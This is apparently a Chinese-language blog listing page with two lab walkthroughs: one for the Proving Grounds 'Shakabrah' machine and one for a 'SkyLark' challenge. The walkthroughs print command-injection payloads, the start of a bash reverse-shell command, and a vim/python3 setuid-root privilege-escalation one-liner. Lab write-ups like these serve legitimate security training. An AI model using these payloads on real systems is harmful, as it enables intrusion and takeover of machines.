發表文章

目前顯示的是有「vim」標籤的文章

Proving Grounds Play : Shakabrah Walkthrough

圖片
 Proving Grounds Play : Shakabrah Walkthrough Foothole (立足點 ) : 80 Port 網站是一個標準有 command injection 的網頁 利用後直接建立 Reverse Sehll PE ( 提權 ) : SUID 利用 vim 成功提權 注意事項 : 相對簡單的一個靶機,沒有需要特別注意的地方 第一步 Rustscan,└─$ rustscan -a 192.168.172.86 --scripts none --ulimit 5000 | tee rustscan 僅有開兩個 Port 22 & 80 snmp 檢查 filtered,沒戲 └─$ sudo nmap -sU -p 161 192.168.172.86 | tee snmp nmap,└─$ sudo nmap -sCV -A -p 22,80 192.168.172.86 | tee nmap 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu)) whatweb,└─$ whatweb http://192.168.172.86 | tee whatweb Exploit-DB Apache 2.4.29,nothing 80 /,是一個可以執行 Ping command 的網站 執行 127.0.0.1 ping Kali 192.168.45.202 從 127.0.0.1 的 TTL 結果來看,是一台 Linux Base 機器 參考這個網站,開始測試 command injection 參考 :  https://gabb4r.gitbook.io/oscp-notes/cheatsheet/command-injection-cheatsheet 開始一一測試發現前面幾個就有用 <!--#exec%20cmd="/usr/bin/id;--> ;id; ;id 看來直接用 ; 後面接命令即可直接執行 ;whoami ;ls -la 也可以直接使用空格沒有問題 ;cat index.php 測試 bash -c "bash -i >& /dev/...

Challenge 3 - SkyLark(11)

圖片
 Challenge 3 - SkyLark(11) 下一台回到外網的 .224 機器 在上個章節拿到的 legacy 憑證,經帳號密碼噴灑後發現可以登入 .224 直接 SSH  登入獲取第一階段的 local.txt 電腦名稱是 amsterdam05 cat /etc/passwd cat /etc/crontab sudo -l SUID check pspy64 看來就是在打 .30 時於 .224 上 8000 Port 發現的 debug.txt 檔案,對 PE 沒有幫助 執行 linpeas.sh 看到 /vim.basic 有 Capabilities 的利用 查找 GTFO 如下 切換到目錄 /usr/bin 然後執行   ./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' 發現會進入 vim 編輯模式且沒有成功 root GTFO 有說明執行的時候要使用 python3,所以修改指令如下 ./vim.basic -c ': python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' 執行後成功提權為 root,並拿取 proof.txt 更新攻擊列表